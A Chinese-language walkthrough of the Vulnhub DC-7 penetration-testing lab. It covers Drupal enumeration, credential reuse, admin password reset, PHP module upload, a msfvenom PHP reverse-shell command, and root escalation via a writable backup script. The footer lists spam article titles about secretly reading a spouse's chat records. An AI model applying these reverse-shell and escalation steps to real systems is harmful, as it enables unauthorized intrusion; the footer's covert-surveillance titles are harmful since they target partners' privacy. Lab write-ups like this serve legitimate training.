Vulnhub靶机DC系列-DC7
0x0:靶场介绍
靶场名称: DC: 7
靶场发布时间:2019-4-26
靶场地址:https://www.vulnhub.com/entry/dc-7,356/
靶场描述:
DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
While this isn't an overly technical challenge, it isn't exactly easy.
While it's kind of a logical progression from an earlier DC release (I won't tell you which one), there are some new concepts involved, but you will need to figure those out for yourself. :-) If you need to resort to brute forcing or dictionary attacks, you probably won't succeed.
What you will need to do, is to think "outside" of the box.
Waaaaaay "outside" of the box. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet
1x0:环境搭建
VMware虚拟机(桥接模式)
2x0:靶机渗透
获取靶机的IP
nmap -sn 192.168.3.0/24
使用nmap来查看靶机的端口信息和系统信息等等
首先去查看80端口的web服务 Drupal
提示不用爆破破解,使用dirb扫描一下目录
存在robots.txt文件
登录地址:
install.mysql 403!
版本大致的判断:
kali去搜索一下drupal8版本的的漏洞(都利用失败了,看一下其他思路才知道需要去下载代码)
直接搜索@DC7USER即可
下载,代码审计 config.php 有数据库的配置信息(没有什么其他可以利用的点)
玄学登录SSH尝试下一把
牛皮。
有一份mbox 邮件
提供一个路径/opt/scripts/backups.sh
解开这个文件,也没什么用。
发现一个可以修改drupal的管理员密码的命令
回到网站去登录管理员账号
具体的版本号
这里需要反弹shell 利用上传插件 插件地址:https://www.drupal.org/project/php
上传插件
上传成功
勾选安装
上传反弹shell
在网上找到一个反向shell的php使用msf生成php_shell也可以
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.3.20 LPORT=1234 -f raw
下载地址:http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
下载下来,修改代码复制到文件中
修改一下既可(上传到页面保存就可以反弹出来)
3x0:提权篇
切换shell
发现backups.sh 具有root权限,但是在www-data组中 可以使用backups.sh 执行命令
直接写入反弹shell
等待连接即可
执行shell 等待连接
读取flag即可
相关文章
锡安是真是假(安西是哪里)
本文导读目录: 1、黑客帝国里锡安是真实的还是虚拟的? 2、《黑客帝国》中锡安是不是真实的 3、黑客帝国里锡安是不是真实存在的 4、锡安出道便受到联盟力捧,他会成为下一个詹姆斯吗? 5...
如何查看我老公手机记录
. 最近很多职业选手和各个直播间都在刷佳慧这个词,“佳慧”其实是一个恐怖游戏的女主角,很多人都被吓到失去了表情管理,那么,LPL佳慧是什么意思什么梗?下面友谊长存小编就来说说。 LPL佳慧是什么意...
怎样调取老婆的qq聊天记录不会被发现
永久删除微信聊天记录,对于很多小伙伴们来说,都是需要学习的一门课程,为的就是保护自己手机里的隐私安全,防止某些‘有心人’想要偷窥我们的信息。那么如何才能做到永久删除微信聊天记录呢?今天小编就为大家推荐...
教父(教父1)
教父讲了一个什么故事? 电影《教父》讲述了以维托·唐·柯里昂为首的黑帮家族的发展过程以及柯里昂的小儿子迈克如何接任父亲成为黑帮首领的故事。电影《教父》讲的是美国黑手党柯里昂家族首领,教父维托柯里昂以及...
上市公司会找黑客保护什么重要资料吗-qq找的黑客靠谱么(在哪里找黑客靠谱)
上市公司会找黑客保护什么重要资料吗相关问题 末日军团 阵容搭配相关问题 米虾除了黑客还有什么 安卓手机破定位软件(安卓手机虚拟定位软件)...
黑客在哪里找-黑客军团第四季第九集bgm(黑客军团第四季剧情解析)
黑客在哪里找相关问题 黑客军团58网盘相关问题 黑客有什么客 强制封别人微信号手机版(如何强制修改微信号) 远程...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!